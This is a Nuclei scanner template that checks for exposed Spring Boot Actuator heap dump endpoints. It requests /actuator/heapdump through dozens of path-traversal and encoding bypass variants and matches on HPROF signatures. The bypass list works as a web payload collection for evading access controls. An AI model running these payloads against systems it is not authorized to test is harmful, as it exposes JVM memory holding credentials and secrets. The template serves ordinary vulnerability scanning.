id: springboot-heapdump-v3_bypass

info:
  name: Spring Boot Actuator - Heap Dump Detection
  author: that_juan_,dwisiswant0,wdahlenb,dk4trin
  severity: critical
  description: A Spring Boot Actuator heap dump was detected. A heap dump is a snapshot of JVM memory, which could expose environment variables and HTTP requests.
  reference:
    - https://github.com/pyn3rd/Spring-Boot-Vulnerability
  tags: springboot,exposure

requests:
  - method: GET
    path:
      - "{{BaseURL}}/..actuator/heapdump"
      - "{{BaseURL}}....//actuator/heapdump"
      - "{{BaseURL}}//....actuator/heapdump"
      - "{{BaseURL}}%252e%252e%255cactuator/heapdump"
      - "{{BaseURL}}%2e%2e%5cactuator/heapdump"
      - "{{BaseURL}}..%255cactuator/heapdump"
      - "{{BaseURL}}..%5cactuator/heapdump"
      - "{{BaseURL}}%5c../actuator/heapdump"
      - "{{BaseURL}}/%5c..actuator/heapdump"
      - "{{BaseURL}}..\\actuator/heapdump"
      - "{{BaseURL}}%2e%2e%2factuator/heapdump"
      - "{{BaseURL}}../actuator/heapdump"
      - "{{BaseURL}}..%2factuator/heapdump"
      - "{{BaseURL}}%2e%2e/actuator/heapdump"
      - "{{BaseURL}}%2e%2e%2factuator/heapdump"
      - "{{BaseURL}}..%252factuator/heapdump"
      - "{{BaseURL}}%252e%252e/actuator/heapdump"
      - "{{BaseURL}}%252e%252e%252factuator/heapdump"
      - "{{BaseURL}}..%5c..%5cactuator/heapdump"
      - "{{BaseURL}}%2e%2e\\actuator/heapdump"
      - "{{BaseURL}}%2e%2e%5cactuator/heapdump"
      - "{{BaseURL}}%252e%252e\\actuator/heapdump"
      - "{{BaseURL}}%252e%252e%255cactuator/heapdump"
      - "{{BaseURL}}..%c0%afactuator/heapdump"
      - "{{BaseURL}}%c0%ae%c0%ae/actuator/heapdump"
      - "{{BaseURL}}%c0%ae%c0%ae%c0%afactuator/heapdump"
      - "{{BaseURL}}..%25c0%25afactuator/heapdump"
      - "{{BaseURL}}%25c0%25ae%25c0%25ae/actuator/heapdump"
      - "{{BaseURL}}%25c0%25ae%25c0%25ae%25c0%25afactuator/heapdump"
      - "{{BaseURL}}..%c1%9cactuator/heapdump"
      - "{{BaseURL}}%c0%ae%c0%ae\\actuator/heapdump"
      - "{{BaseURL}}%c0%ae%c0%ae%c1%9cactuator/heapdump"
      - "{{BaseURL}}..%25c1%259cactuator/heapdump"
      - "{{BaseURL}}%25c0%25ae%25c0%25ae\\actuator/heapdump"
      - "{{BaseURL}}%25c0%25ae%25c0%25ae%25c1%259cactuator/heapdump"
      - "{{BaseURL}}..%%32%66actuator/heapdump"
      - "{{BaseURL}}%%32%65%%32%65/actuator/heapdump"
      - "{{BaseURL}}%%32%65%%32%65%%32%66actuator/heapdump"
      - "{{BaseURL}}..%%35%63actuator/heapdump"
      - "{{BaseURL}}%%32%65%%32%65/actuator/heapdump"
      - "{{BaseURL}}%%32%65%%32%65%%35%63actuator/heapdump"
      - "{{BaseURL}}../actuator/heapdump"
      - "{{BaseURL}}...\\actuator/heapdump"
      - "{{BaseURL}}..../actuator/heapdump"
      - "{{BaseURL}}....\\actuator/heapdump"
      - "{{BaseURL}}........................................................................../actuator/heapdump"
      - "{{BaseURL}}..........................................................................\\actuator/heapdump"
      - "{{BaseURL}}..%u2215actuator/heapdump"
      - "{{BaseURL}}%uff0e%uff0e%u2215actuator/heapdump"
      - "{{BaseURL}}..%u2216actuator/heapdump"
      - "{{BaseURL}}..%uEFC8actuator/heapdump"
      - "{{BaseURL}}..%uF025actuator/heapdump"
      - "{{BaseURL}}%uff0e%uff0e\\actuator/heapdump"
      - "{{BaseURL}}%uff0e%uff0e%u2216actuator/heapdump"

    stop-at-first-match: true
    max-size: 2097152 # 2MB - Max Size to read from server response
    matchers-condition: or
    matchers:
      - type: binary
        part: body
        binary:
          - "4a4156412050524f46494c45" # "JAVA PROFILE"
          - "4850524f46" # "HPROF"
          - "1f8b080000000000" # Gunzip magic byte
        
      - type: word
        words:
          - "JAVA PROFILE"
          - "HPROF"